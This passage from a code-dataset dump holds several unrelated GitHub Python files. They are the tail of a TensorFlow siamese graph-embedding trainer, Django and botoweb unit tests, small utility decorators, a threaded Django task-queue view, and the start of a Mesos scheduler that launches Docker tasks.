tf.placeholder(tf.float32, shape=(None, args.MaxNodeNum, args.EmbeddingSize), name='u_init_test')\n\n label = tf.placeholder(tf.float32, shape=(None, ), name='label')\n\n with tf.variable_scope(\"siamese\") as scope:\n embedding_network = EmbeddingNetwork(args.NumberOfRelu, args.MaxNodeNum, args.EmbeddingSize, args.AttrDims, args.T)\n graph_emb_left = embedding_network.embed(neighbors_left, attributes_left, u_init_left)\n scope.reuse_variables()\n graph_emb_right = embedding_network.embed(neighbors_right, attributes_right, u_init_right)\n\n norm_emb_left = tf.nn.l2_normalize(graph_emb_left, 1)\n norm_emb_right = tf.nn.l2_normalize(graph_emb_right, 1)\n cos_similarity = tf.reduce_sum(tf.multiply(norm_emb_left, norm_emb_right), 1)\n\n # Paper's Loss\n loss_op = tf.reduce_mean(tf.square(cos_similarity - label))\n accuracy = tf.reduce_sum(tf.cast(tf.equal(tf.sign(cos_similarity), label), tf.float32)) / tf.cast(tf.shape(neighbors_left)[0], tf.float32)\n positive_accuracy = tf.reduce_sum(tf.cast(tf.equal(tf.gather(tf.sign(cos_similarity), tf.where(tf.equal(label, 1))), 1), tf.float32)) / tf.cast(tf.shape(tf.where(tf.equal(label, 1)))[0], tf.float32)\n positive_num = tf.shape(tf.where(tf.equal(label, 1)))[0]\n negative_accuracy = tf.reduce_sum(tf.cast(tf.equal(tf.gather(tf.sign(cos_similarity), tf.where(tf.equal(label, -1))), -1), tf.float32)) / tf.cast(tf.shape(tf.where(tf.equal(label, -1)))[0], tf.float32)\n negative_num = tf.shape(tf.where(tf.equal(label, -1)))[0]\n # End of Paper's Loss\n\n # Vic's Loss\n '''\n loss_p = (1+label)*tf.cast(tf.equal(tf.mod(global_step,2),1),tf.float32)*(1-cos_similarity) # loss is the degree\n loss_n = (1-label)*tf.cast(tf.equal(tf.mod(global_step,2),0),tf.float32)*tf.cast(tf.greater(cos_similarity, 0.5),tf.float32)*(1+ cos_similarity-0.5)\n\n # loss_p = (1 + label) * (1 - cos_similarity) # loss is the degree\n # loss_n = (1 - label) * tf.cast(tf.greater(cos_similarity, 0.5), tf.float32) * (1 + cos_similarity - 0.5)\n loss_op = tf.reduce_mean( tf.square(loss_p + loss_n) )\n accuracy = tf.reduce_sum(tf.cast(tf.equal(tf.sign(cos_similarity - 0.5), label), tf.float32)) / tf.cast(tf.shape(neighbors_left)[0], tf.float32)\n positive_accuracy = tf.reduce_sum(tf.cast(tf.equal(tf.gather(tf.sign(cos_similarity - 0.5), tf.where(tf.equal(label, 1))), 1), tf.float32)) / tf.cast(tf.shape(tf.where(tf.equal(label, 1)))[0], tf.float32)\n positive_num = tf.shape(tf.where(tf.equal(label, 1)))[0]\n negative_accuracy = tf.reduce_sum(tf.cast(tf.equal(tf.gather(tf.sign(cos_similarity - 0.5), tf.where(tf.equal(label, -1))), -1), tf.float32)) / tf.cast(tf.shape(tf.where(tf.equal(label, -1)))[0], tf.float32)\n negative_num = tf.shape(tf.where(tf.equal(label, -1)))[0]\n '''\n # End of Vic's Loss\n\n # Debug ops\n bingo = tf.cast(tf.equal(tf.sign(cos_similarity), label), tf.float32)\n correct_idx = tf.where(tf.equal(bingo, 1))\n incorrect_idx = tf.where(tf.equal(bingo, 0))\n\n # Bulid Inference Graph\n graph_emb_inference = embedding_network.embed(neighbors_test, attributes_test, u_init_test)\n norm_graph_emb_inference = tf.nn.l2_normalize(graph_emb_inference, 1)\n\n # This is vic's loss function\n # loss_op = (1 + label) * (-0.5 + tf.sigmoid(tf.reduce_mean(tf.squared_difference(graph_emb_left, graph_emb_right)))) + (1 - label) * tf.square(1 + cos_similarity)\n with tf.name_scope('Accuracy'):\n tf.summary.scalar('accuracy', accuracy)\n tf.summary.scalar('positive_accuracy', positive_accuracy)\n tf.summary.scalar('negative_accuracy', negative_accuracy)\n with tf.name_scope('Cost'):\n tf.summary.scalar('loss', loss_op)\n merged = tf.summary.merge_all()\n\n train_op = tf.train.AdamOptimizer(args.LearningRate).minimize(loss_op, global_step=global_step)\n # train_op = tf.train.GradientDescentOptimizer(args.LearningRate).minimize(loss_op, global_step=global_step)\n\n print('Preparing the data for the model...... [{}]'.format(str(datetime.now())))\n if args.TSNE_Mode:\n tsne_data = {'samples': None, 'labels': []}\n tsne_neighbors = []\n tsne_attributes = []\n tsne_u_inits = []\n with open(args.TrainingPlk, 'rb') as f_in:\n data = pickle.load(f_in)\n attr_avg_std_map = normalize_data(data['train']['sample'])\n with open(args.TSNE_InputData, 'rb') as f_in:\n data = pickle.load(f_in)\n for sample in data:\n neighbors, attributes, u_init = get_graph_info_mat(sample, None, args.MaxNodeNum, attributes_dim, args.EmbeddingSize)\n tsne_neighbors.append(neighbors)\n tsne_attributes.append(attributes)\n tsne_u_inits.append(u_init)\n tsne_data['labels'].append(sample['identifier'])\n\n print('Starting the tensorflow session...... [{}]'.format(str(datetime.now())))\n with tf.Session() as sess:\n train_writer = tf.summary.FileWriter(os.path.join(args.LOG_DIR, 'train'), sess.graph)\n saver = tf.train.Saver(max_to_keep=args.MaxNumModelToKeep)\n\n if args.LoadModel:\n print('Loading the stored model...... [{}]'.format(str(datetime.now())))\n states = tf.train.get_checkpoint_state(args.MODEL_DIR)\n saver.restore(sess, states.model_checkpoint_path)\n else:\n init_op = tf.global_variables_initializer()\n sess.run(init_op)\n\n if args.Inference:\n sess.run(iterator.initializer, feed_dict={shuffle_seed: 0})\n id_embs = {}\n from numpy import linalg as LA\n while True:\n try:\n cur_neighbors_ls, cur_neighbors_rs, cur_attributes_ls, cur_attributes_rs, cur_u_init_ls, cur_u_init_rs, cur_labels, identifiers_left, identifiers_right = sess.run(next_element)\n except:\n break\n embs = sess.run(graph_emb_inference, {neighbors_test: cur_neighbors_ls, attributes_test: cur_attributes_ls, u_init_test: cur_u_init_ls})\n for idx, id_ in enumerate(identifiers_left):\n id_embs[id_.decode('utf-8')] = embs[idx]\n embs = sess.run(norm_graph_emb_inference, {neighbors_test: cur_neighbors_rs, attributes_test: cur_attributes_rs, u_init_test: cur_u_init_rs})\n for idx, id_ in enumerate(identifiers_right):\n id_embs[id_.decode('utf-8')] = embs[idx]\n while True:\n choice = input('Please input id for inference: ')\n chosen_emb = id_embs[choice]\n pri = []\n for id_ in id_embs:\n cos_sim = scipy.spatial.distance.cosine(chosen_emb, id_embs[id_])\n pri.append([id_, -(cos_sim - 1)])\n pri.sort(key=lambda x: x[1])\n for i in reversed(pri[-10:]):\n print(i[0], i[1])\n print()\n\n sys.exit(-1)\n\n\n\n if args.StartIPython:\n _start_shell(locals(), globals())\n elif args.TSNE_Mode:\n print('Start in t-SNE mode (Do embeddings for {}) [{}]'.format(args.TSNE_InputData, str(datetime.now())))\n count = 0\n embs = []\n while count < len(data):\n cur_neighbors = tsne_neighbors [count: count + args.BatchSize]\n cur_attributes = tsne_attributes[count: count + args.BatchSize]\n cur_u_inits = tsne_u_inits [count: count + args.BatchSize]\n embs += sess.run(norm_graph_emb_inference, {neighbors_test: cur_neighbors, attributes_test: cur_attributes, u_init_test: cur_u_inits}).tolist()\n count += len(cur_neighbors)\n tsne_data['samples'] = embs\n emb_plk_path = os.path.join(args.LOG_DIR, 'embeddings.plk')\n print('Writing embeddings.plk file to {}...... [{}]'.format(emb_plk_path, str(datetime.now())))\n with open(emb_plk_path, 'wb') as f_out:\n pickle.dump(tsne_data, f_out)\n metadata_path = os.path.join(args.LOG_DIR, 'metadata.tsv')\n print('Writing metadata.csv file to {}...... [{}]'.format(metadata_path, str(datetime.now())))\n with open(metadata_path, 'w', newline='') as csvfile:\n csv_writer = csv.writer(csvfile, delimiter='\\t', quotechar='\\'', quoting=csv.QUOTE_MINIMAL)\n csv_writer.writerow(['dim{}'.format(x) for x in range(args.EmbeddingSize)] + ['id', 'label'])\n out_hash = []\n for idx, emb in enumerate(tsne_data['samples']):\n label = tsne_data['labels'][idx]\n items = label.split(':')\n out_label = '{}:{}:{}'.format(items[0], items[1], items[3])\n if out_label not in out_hash:\n out_hash.append(out_label)\n id_idx = out_hash.index(out_label)\n csv_writer.writerow(emb + [id_idx, '\"{}\"'.format(label)])\n print('Generate embedding vectors successfully. To view the visualization, please run:\\n$ ./create_tsne_projector.py {} {} YOUR_EMBEDDING_LOG_DIR'.format(emb_plk_path, metadata_path))\n else:\n print('Start in training mode. [{}]'.format(str(datetime.now())))\n epoch_loss = float('Inf')\n total_step = int(sess.run(global_step))\n train_acc = 0\n test_acc = 0\n\n test_neighbors_ls = []\n test_neighbors_rs = []\n test_attributes_ls = []\n test_attributes_rs = []\n test_u_init_ls = []\n test_u_init_rs = []\n test_labels = []\n\n\n cur_epoch = 0\n epoch_pos_sum = 0\n epoch_pos_num = 0\n epoch_neg_sum = 0\n epoch_neg_num = 0\n if args.Debug:\n false_count = 0\n sess.run(iterator.initializer, feed_dict={shuffle_seed: cur_epoch})\n print('\\tStart training epoch...... [{}]'.format(str(datetime.now())))\n while True:\n try:\n cur_neighbors_ls, cur_neighbors_rs, cur_attributes_ls, cur_attributes_rs, cur_u_init_ls, cur_u_init_rs, cur_labels, identifiers_left, identifiers_right = sess.run(next_element)\n\n if args.UpdateModel:\n _ = sess.run(train_op, {\n neighbors_left: cur_neighbors_ls, attributes_left: cur_attributes_ls, u_init_left: cur_u_init_ls,\n neighbors_right: cur_neighbors_rs, attributes_right: cur_attributes_rs, u_init_right: cur_u_init_rs,\n label: cur_labels\n })\n\n cos_sim, loss, batch_acc, positive_acc, pos_num, negative_acc, neg_num = sess.run([cos_similarity, loss_op, accuracy, positive_accuracy, positive_num, negative_accuracy, negative_num], {\n neighbors_left: cur_neighbors_ls, attributes_left: cur_attributes_ls, u_init_left: cur_u_init_ls,\n neighbors_right: cur_neighbors_rs, attributes_right: cur_attributes_rs, u_init_right: cur_u_init_rs,\n label: cur_labels\n })\n\n if pos_num != 0:\n epoch_pos_sum += (positive_acc * pos_num)\n epoch_pos_num += pos_num\n if neg_num != 0:\n epoch_neg_sum += (negative_acc * neg_num)\n epoch_neg_num += neg_num\n\n if args.Debug:\n if cur_epoch == 0:\n for cur_neighbors_l, cur_neighbors_r, cur_attributes_l, cur_attributes_r, cur_u_init_l, cur_u_init_r, cur_label, identifier_left, identifier_right in zip(cur_neighbors_ls, cur_neighbors_rs, cur_attributes_ls, cur_attributes_rs, cur_u_init_ls, cur_u_init_rs, cur_labels, identifiers_left, identifiers_right):\n cos_sim, loss, batch_acc, positive_acc, negative_acc = sess.run([cos_similarity, loss_op, accuracy, positive_accuracy, negative_accuracy], {\n neighbors_left: [cur_neighbors_l], attributes_left: [cur_attributes_l], u_init_left: [cur_u_init_l],\n neighbors_right: [cur_neighbors_r], attributes_right: [cur_attributes_r], u_init_right: [cur_u_init_r],\n label: [cur_label]\n })\n if cur_label != np.sign(cos_sim[0]):\n print(cur_label, '#', '{:10.8f}'.format(cos_sim[0]), '#', identifier_left.decode('utf-8'), '#', identifier_right.decode('utf-8'))\n false_count += 1\n else:\n print('False count: ', false_count)\n sys.exit(-1)\n\n sys.stdout.write('Epoch: {:6}, BatchLoss: {:8.7f}, TotalStep: {:7}, TrainAcc: {:.4f}, PosAcc: {:.4f}, NegAcc: {:.4f}, TestAcc: {:.4f} \\r'.format(\n cur_epoch , loss , total_step , batch_acc , positive_acc , negative_acc , test_acc))\n sys.stdout.flush()\n\n if args.UpdateModel:\n summary = sess.run(merged, {\n neighbors_left: cur_neighbors_ls, attributes_left: cur_attributes_ls, u_init_left: cur_u_init_ls,\n neighbors_right: cur_neighbors_rs, attributes_right: cur_attributes_rs, u_init_right: cur_u_init_rs,\n label: cur_labels\n })\n train_writer.add_summary(summary, total_step)\n\n total_step = int(sess.run(global_step))\n\n if args.UpdateModel:\n if os.path.isabs(args.MODEL_DIR):\n relative_model_dir = os.path.relpath(args.MODEL_DIR, os.getcwd())\n saver.save(sess, os.path.join(relative_model_dir, 'model.ckpt'), global_step=global_step)\n else:\n saver.save(sess, os.path.join(args.MODEL_DIR, 'model.ckpt'), global_step=global_step)\n except tf.errors.OutOfRangeError:\n sess.run(test_iterator.initializer)\n test_acc_inc = 0\n test_num = 0\n while True:\n try:\n test_neighbors_ls, test_neighbors_rs, test_attributes_ls, test_attributes_rs, test_u_init_ls, test_u_init_rs, test_labels, identifiers_lefts, identifiers_rights = sess.run(test_next_element)\n except tf.errors.OutOfRangeError:\n break\n test_acc = sess.run(accuracy, {\n neighbors_left: test_neighbors_ls, attributes_left : test_attributes_ls, u_init_left : test_u_init_ls,\n neighbors_right: test_neighbors_rs, attributes_right: test_attributes_rs, u_init_right: test_u_init_rs,\n label: test_labels\n })\n test_acc_inc += test_acc * len(test_labels)\n test_num += len(test_labels)\n\n test_acc = test_acc_inc / test_num\n if args.UpdateModel:\n test_acc_summary = tf.Summary()\n test_acc_summary.value.add(tag='Accuracy/test_accuracy', simple_value=test_acc)\n train_writer.add_summary(test_acc_summary, total_step)\n print('Epoch: {:6}, BatchLoss: {:8.7f}, TotalStep: {:7}, TrainAcc: {:.4f}, PosAcc: {:.4f}, NegAcc: {:.4f},TestAcc: {:.4f} '.format(cur_epoch, loss, total_step, (epoch_pos_sum + epoch_neg_sum) / (epoch_pos_num + epoch_neg_num), epoch_pos_sum / epoch_pos_num, epoch_neg_sum / epoch_neg_num, test_acc))\n sys.stdout.flush()\n cur_epoch += 1\n epoch_pos_sum = 0\n epoch_neg_sum = 0\n epoch_pos_num = 0\n epoch_neg_num = 0\n if cur_epoch < args.Epochs:\n sess.run(iterator.initializer, feed_dict={shuffle_seed: cur_epoch})\n else:\n print('Training finished. [{}]'.format(str(datetime.now())))\n break\n\n\nif __name__ == '__main__':\n main(sys.argv)\n\n","repo_name":"bdsword/GraphEmb","sub_path":"graph_emb.py","file_name":"graph_emb.py","file_ext":"py","file_size_in_byte":30552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"1667345144","text":"import pytest\nfrom portal.apps.portal_messages.models import IntroMessages, CustomMessageTemplate, CustomMessages\n\n\n@pytest.fixture\ndef intromessage_mock(authenticated_user):\n IntroMessages.objects.create(user=authenticated_user, component=\"HISTORY\", unread=False)\n\n\n\"\"\"\nTest get of \"read\" (not unread) IntroMessages for an authenticated user and\nconfirm that the JSON is coming back as expected.\n\"\"\"\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef test_intromessages_get(client, authenticated_user, intromessage_mock):\n response = client.get('/api/portal_messages/intro/')\n data = response.json()\n assert response.status_code == 200\n assert data[\"response\"] == [{\"component\": \"HISTORY\", \"unread\": False}]\n\n\n\"\"\"\nTest get of \"read\" IntroMessages for an unauthenticated user\nUser should be redirected to login\n\"\"\"\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef test_intromessages_get_unauthenticated_user(client, regular_user):\n response = client.get('/api/portal_messages/intro/')\n assert response.status_code == 302\n\n\n\"\"\"Test the marking of an IntroMessage as \"read\" by writing to the database \"\"\"\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef test_intromessages_put(client, authenticated_user):\n body = {\n 'ACCOUNT': 'True',\n 'ALLOCATIONS': 'True',\n 'APPLICATIONS': 'True',\n 'DASHBOARD': 'True',\n 'DATA': 'True',\n 'HISTORY': 'False',\n 'TICKETS': 'True',\n 'UI': 'True'\n }\n\n response = client.put('/api/portal_messages/intro/',\n content_type=\"application/json\",\n data=body)\n assert response.status_code == 200\n # should be eight rows in the database for the user\n assert len(IntroMessages.objects.all()) == 8\n # let's check to see all rows exist correctly\n for component_name, component_value in body.items():\n correct_status = False\n db_message = IntroMessages.objects.filter(component=component_name)\n if db_message and db_message[0].unread != component_value:\n correct_status = True\n\n assert correct_status\n\n\n@pytest.fixture\ndef custommessagetemplate_mock():\n template = CustomMessageTemplate.objects.create(component='HISTORY', message_type='warning', message='test message', dismissible=True)\n yield template\n\n\n@pytest.fixture\ndef custommessage_mock(authenticated_user, custommessagetemplate_mock):\n message = CustomMessages.objects.create(user=authenticated_user, template=custommessagetemplate_mock)\n yield message\n\n\n\"\"\"\nTest get of \"read\" (not unread) CustomMessages for an authenticated user and\nconfirm that the JSON is coming back as expected.\n\"\"\"\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef test_custommessages_get(client, authenticated_user, custommessage_mock, custommessagetemplate_mock):\n response = client.get('/api/portal_messages/custom/')\n data = response.json()\n assert response.status_code == 200\n assert data[\"response\"] == {\n 'messages': [{\n \"template\": {\n 'id': custommessagetemplate_mock.id,\n 'component': 'HISTORY',\n 'message_type': 'warning',\n 'dismissible': True,\n 'message': 'test message'\n },\n \"unread\": True\n }]\n }\n\n\n\"\"\"\nTest get of \"read\" CustomMessages for an unauthenticated user\nUser should be redirected to login\n\"\"\"\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef test_custommessages_get_unauthenticated_user(client, regular_user):\n response = client.get('/api/portal_messages/custom/')\n assert response.status_code == 302\n\n\n\"\"\"Test the marking of an CustomMessage as \"read\" by writing to the database \"\"\"\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef test_custommessages_put(client, authenticated_user, custommessage_mock, custommessagetemplate_mock):\n original_message = CustomMessages.objects.get(template__id=custommessagetemplate_mock.id)\n assert original_message.unread is True\n\n body = {\n 'templateId': custommessagetemplate_mock.id,\n 'unread': False\n }\n\n response = client.put('/api/portal_messages/custom/',\n content_type=\"application/json\",\n data=body)\n assert response.status_code == 200\n\n assert len(CustomMessages.objects.all()) == 1\n\n db_message = CustomMessages.objects.get(template__id=body['templateId'])\n # Ensure that it updated the value correctly\n assert db_message.unread == body['unread']\n","repo_name":"TACC/Core-Portal","sub_path":"server/portal/apps/portal_messages/intro_unit_test.py","file_name":"intro_unit_test.py","file_ext":"py","file_size_in_byte":4623,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"94"} +{"seq_id":"16053677739","text":"from json import load, dump\nimport logging\nfrom time import time\n\n\ndef get_config() -> dict:\n \"\"\"\n Возвращает словарь с параметрами из конфига\n\n :return:\n \"\"\"\n with open('config.json') as file:\n ans: dict = load(file)\n\n if ans[\"use_local_config\"] is True:\n try:\n with open('local_config.json') as file:\n _data = load(file)\n for key, val in _data.items():\n ans[key] = val\n except FileNotFoundError:\n pass\n\n return ans\n\n\ndef error_handler_for_http_answer(func):\n \"\"\"\n Декоратор обработки ошибок для функций ответа на запросы\n Если в процессе выполнения потенциально опасного кода вызвался Exception, будет возвращено описание ошибки и код 502\n :param func:\n :return:\n \"\"\"\n\n def wrapper(*args, **kwargs):\n try:\n return func(*args, **kwargs)\n except Exception as E:\n logging.error(str(E))\n print(\"Error:\", E)\n return str(E), 502\n\n return wrapper\n\n\ndef banchmark(iters=1, active=True):\n def wrapper(func):\n def wrapper2(*args, **kwargs):\n if active is True:\n total = 0\n for i in range(iters):\n start = time()\n ans = func(*args, **kwargs)\n end = time()\n total += end - start\n print('Среднее время выполнения функции:', total / iters)\n\n return func(*args, **kwargs)\n\n return wrapper2\n\n return wrapper\n","repo_name":"dr3al/REST_chatService","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"75115914549","text":"# NOTE: these tests need to be executed from the root\n# directory of an svn checkout using py.test\n\nimport boto\nimport time\nimport sys;sys.path.append(\"\")\nimport botoweb;botoweb.set_env(\"example\")\n\nfrom botoweb.appserver.handlers.db import JSONWrapper\nfrom botoweb.db.model import Model\nfrom botoweb.db.property import StringProperty, ReferenceProperty, IntegerProperty\ntry:\n\timport json\nexcept ImportError:\n\timport simplejson as json\n\nclass ExampleModel(Model):\n\t\"\"\"Test Model object\"\"\"\n\t# Test all the regular properties\n\tname = StringProperty(verbose_name=\"Name\")\n\tparent = ReferenceProperty(Model, verbose_name=\"Parent Object\")\n\tnumber = IntegerProperty(verbose_name=\"Integer Property\")\n\n\t# This property is advertantly set to \"None\" by default,\n\t# and should come out as a null object, not a string\n\tsome_null = StringProperty(verbose_name=\"Some Null property\", default=\"None\")\n\n\nclass TestJSON(object):\n\t\"\"\"Test the JSON Serialization through the DB Handler\n\tThis doesn't actually launch a botoweb instance, instead\n\tit calls the JSONWrapper directly\"\"\"\n\n\tdef setup_class(cls):\n\t\t\"\"\"Setup this class\"\"\"\n\t\tobj = ExampleModel()\n\t\tobj.id = \"TEST\"\n\t\tobj.name = \"Some Name\"\n\t\tobj.number = 1\n\n\t\tobj2 = ExampleModel()\n\t\tobj2.id = \"TEST-PARENT\"\n\t\tobj2.name = \"Second Name\"\n\t\tobj2.number = 2\n\t\tobj2.parent = obj\n\n\t\tobj.parent = obj2\n\n\n\t\tcls.objs = [obj, obj2]\n\t\tcls.wrapper = JSONWrapper(iter([obj, obj2]), user=None)\n\n\tdef teardown_class(cls):\n\t\t\"\"\"Cleanup\"\"\"\n\t\tpass\n\n\tdef test_fetch(self):\n\t\t\"\"\"Test Fetching one item\"\"\"\n\t\tobj = json.loads(self.wrapper.next())\n\t\treal_obj = self.objs[0]\n\t\tassert(obj['__id__'] == real_obj.id)\n\t\tassert(obj['__type__'] == real_obj.__class__.__name__)\n\t\tassert(obj['name'] == real_obj.name)\n\t\tassert(obj['number'] == real_obj.number)\n\t\tassert(obj['some_null'] == None)\n\n\t\t# Check the parent object\n\t\tobj2 = obj['parent']\n\t\treal_obj2 = self.objs[1]\n\t\tassert(obj2['__type__'] == real_obj2.__class__.__name__)\n\t\tassert(obj2['__id__'] == real_obj2.id)\n\n\tdef test_fetch_again(self):\n\t\t\"\"\"Test fetching again\"\"\"\n\t\tobj = json.loads(self.wrapper.next())\n\t\treal_obj = self.objs[1]\n\t\tassert(obj['__id__'] == real_obj.id)\n\n\tdef test_put_valid(self):\n\t\t\"\"\"Test putting an object via JSON\"\"\"\n\t\tpass\n","repo_name":"boto/botoweb","sub_path":"tests/test_json.py","file_name":"test_json.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"94"} +{"seq_id":"2361518609","text":"import threading\nfrom django.http import JsonResponse\nfrom random import uniform\nfrom math import sqrt\nfrom threading import Thread\nfrom time import sleep, time\nimport logging\n\nfrom ulid import ULID\n\n'''\nlistando: curl http://localhost:8000/norm/\n\nregistrando tarefa: curl http://localhost:8000/norm/1000000000/\n'''\n\n\n\nlogger = logging.getLogger('__name__')\n\ntask_queue = []\n\nclass NormError(Exception): ...\n\nclass EmpetyQueueError(Exception): ...\n\n\nclass Task:\n\n def __init__(self, size):\n self.id = str(ULID())\n self.size = size\n self.status = 'Scheduled'\n self.result = None\n self.time = None\n\n def to_dict(self):\n return {\n 'id': str(self.id),\n 'size': self.size,\n 'status': self.status,\n 'result': self.result,\n 'time': self.time,\n }\n\n\nclass Queue:\n\n def __init__(self):\n self._tasks_to_do = []\n self._tasks_running = []\n self._tasks_processed = []\n self._start_threads = False\n\n def find(self, id):\n for t in self._tasks:\n if t.id == id:\n return t\n\n def all(self):\n return [t.to_dict() for t in self._tasks_to_do + self._tasks_processed + self._tasks_running]\n\n def start_threads(self, number_of_threads=2):\n self._start_threads = True\n for _ in range(number_of_threads):\n Thread(target=consumer, args=(tasks,)).start()\n\n @property\n def there_are_no_thread_yet(self):\n return not self._start_threads\n\n @property\n def tasks_todo(self):\n return self._tasks_to_do\n\n @property\n def tasks_running(self):\n return self._tasks_running\n\n def register(self, task):\n self._tasks_to_do.append(task)\n\n def processed(self, task):\n self._tasks_running.remove(task)\n self._tasks_processed.append(task)\n\n def get_new_tasks(self):\n try:\n task = self._tasks_to_do.pop()\n self._tasks_running.append(task)\n return task\n except IndexError:\n raise EmpetyQueueError\n\n\ntasks = Queue()\n\ndef consumer(tasks):\n while True:\n logger.info('Quantidade de tasks todo: %d' % len(tasks.tasks_todo))\n logger.info('Quantidade de tasks runnning: %d' % len(tasks.tasks_running))\n try:\n task = tasks.get_new_tasks()\n\n init = time()\n worker(task)\n task.time = time() - init\n\n tasks.processed(task)\n except EmpetyQueueError:\n sleep(10)\n continue\n\n\ndef worker(task):\n task.status = 'running ...'\n try:\n result = norm(size=task.size)\n task.result = result\n task.status = 'done'\n except NormError:\n task.status = 'fail.'\n\n\ndef norm(size=10000):\n\n if size == 101:\n raise NormError\n\n x = (uniform(-0.1, 0.1) for _ in range(size))\n\n return sqrt(sum(a**2 for a in x))\n\n\ndef register(request, size):\n\n if tasks.there_are_no_thread_yet:\n tasks.start_threads()\n\n task = Task(size)\n tasks.register(task)\n return JsonResponse({'task_id': task.id})\n\n\ndef list_tasks(request):\n\n logger.warning('Quantidade de tasks runnning: %d' % len(tasks.tasks_running))\n list_ = tasks.all()\n\n return JsonResponse({'result': list_})\n\n\ndef number_of_threads(request):\n return JsonResponse({'threads_number': threading.active_count()})\n","repo_name":"HenriqueCCdA/DjangoLab","sub_path":"lab/cal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"42565117920","text":"#!/usr/bin/env python\nimport random\nimport sys\nimport logging\nimport uuid\nimport signal\nfrom mesos.interface import Scheduler, mesos_pb2\nfrom mesos.native import MesosSchedulerDriver\nimport time\n\nlogging.basicConfig(level=logging.INFO)\nTASK_CPUS = 0.5\nTASK_MEM = 1024\nRUNNING_TASKS = 5\n\n\ndef get_available_port(offer):\n logging.info(offer.resources[3])\n begin = offer.resources[3].ranges.range[0].begin\n end = offer.resources[3].ranges.range[0].end\n logging.info(\"Port range [%s:%s]\", begin, end)\n return random.randint(begin, end)\n\n\ndef new_task(offer, name, cmd):\n task = mesos_pb2.TaskInfo()\n task.task_id.value = str(uuid.uuid4())\n task.slave_id.value = offer.slave_id.value\n task.name = name\n task.command.value = cmd\n\n cpus = task.resources.add()\n cpus.name = \"cpus\"\n cpus.type = mesos_pb2.Value.SCALAR\n cpus.scalar.value = TASK_CPUS\n\n mem = task.resources.add()\n mem.name = \"mem\"\n mem.type = mesos_pb2.Value.SCALAR\n mem.scalar.value = TASK_MEM\n\n return task\n\n\ndef new_docker_task(offer, name, cmd, image):\n task = new_task(offer, name, cmd)\n\n container = mesos_pb2.ContainerInfo()\n container.type = 1\n\n docker = mesos_pb2.ContainerInfo.DockerInfo()\n docker.image = image\n docker.network = 2\n docker.force_pull_image = True\n\n mesos_ports = task.resources.add()\n mesos_ports.name = \"ports\"\n mesos_ports.type = mesos_pb2.Value.RANGES\n available_port = get_available_port(offer)\n logging.info(\"Port assignment: %s\", available_port)\n port_range = mesos_ports.ranges.range.add()\n port_range.begin = available_port\n port_range.end = available_port\n docker_port = docker.port_mappings.add()\n docker_port.host_port = available_port\n docker_port.container_port = 8080\n\n container.docker.MergeFrom(docker)\n task.container.MergeFrom(container)\n\n return task\n\n\ndef max_tasks_to_run_with_offer( offer):\n logging.info(\"CPUs: %s MEM: %s\",\n offer.resources[0].scalar.value,\n offer.resources[1].scalar.value)\n\n cpu_tasks = int(offer.resources[0].scalar.value/TASK_CPUS)\n mem_tasks = int(offer.resources[1].scalar.value/TASK_MEM)\n # offer.resources[2] would be disk\n try:\n port_tasks = int(offer.resources[3].ranges.range[0].end - offer.resources[3].ranges.range[0].begin)\n except IndexError:\n port_tasks = 0\n max_tasks = cpu_tasks if cpu_tasks <= mem_tasks else mem_tasks\n\n return max_tasks if max_tasks <= port_tasks else port_tasks\n\n\ndef shutdown(signal, frame):\n logging.info(\"Shutdown signal\")\n driver.stop()\n time.sleep(5)\n sys.exit(0)\n\n\nclass HelloWorldScheduler(Scheduler):\n def __init__(self):\n self.runningTasks = 0\n '''\n Called when the scheduler successfully registers with a Mesos master\n Contains a unique Framework ID generate by the master\n '''\n def registered(self, driver, framework_id, master_info):\n logging.info(\"Registered with framework id: %s on: %s\",\n framework_id, master_info.hostname)\n\n def resourceOffers(self, driver, offers):\n logging.info(\"Recieved resource offers: %s\",\n [o.id.value for o in offers])\n tasks_to_start = RUNNING_TASKS - self.runningTasks\n for offer in offers:\n if RUNNING_TASKS <= self.runningTasks:\n driver.declineOffer(offer.id)\n return\n count_tasks = max_tasks_to_run_with_offer(offer)\n start_tasks = count_tasks if count_tasks <= tasks_to_start else tasks_to_start\n tasks_to_start -= start_tasks\n\n if start_tasks <= 0:\n logging.info(\"Decline Offer %s\", offer.id)\n driver.declineOffer(offer.id)\n return\n\n logging.info(\"Start %s tasks\", start_tasks)\n tasks = []\n for i in range(start_tasks):\n task = new_docker_task(offer,\n \"Docker python \",\n \"python3 -m http.server 8080\",\n \"python:3\")\n logging.info(\"Added task %s \"\n \"using offer %s.\",\n task.task_id.value,\n offer.id.value)\n tasks.append(task)\n logging.info(\"Launch %s Tasks\", len(tasks))\n driver.launchTasks(offer.id, tasks)\n\n def statusUpdate(self, driver, update):\n '''\n when a task is started, over,\n killed or lost (slave crash, ....), this method\n will be triggered with a status message.\n '''\n logging.info(\"Task %s is in state %s\" %\n (update.task_id.value,\n mesos_pb2.TaskState.Name(update.state)))\n\n if update.state == mesos_pb2.TASK_RUNNING:\n self.runningTasks += 1\n logging.info(\"Running tasks: %s\", self.runningTasks)\n return\n\n if update.state != mesos_pb2.TASK_RUNNING or\\\n update.state != mesos_pb2.TASK_STARTING or\\\n update.state != mesos_pb2.TASK_STAGING:\n self.runningTasks -= 1\n logging.info(\"Running tasks: %s\", self.runningTasks)\n\n\ndef shutdown(signal, frame):\n logging.info(\"Shutdown signal\")\n driver.stop()\n time.sleep(5)\n sys.exit(0)\n\nif __name__ == '__main__':\n framework = mesos_pb2.FrameworkInfo()\n framework.user = \"\" # Have Mesos fill in the current user.\n framework.name = \"hello-world\"\n 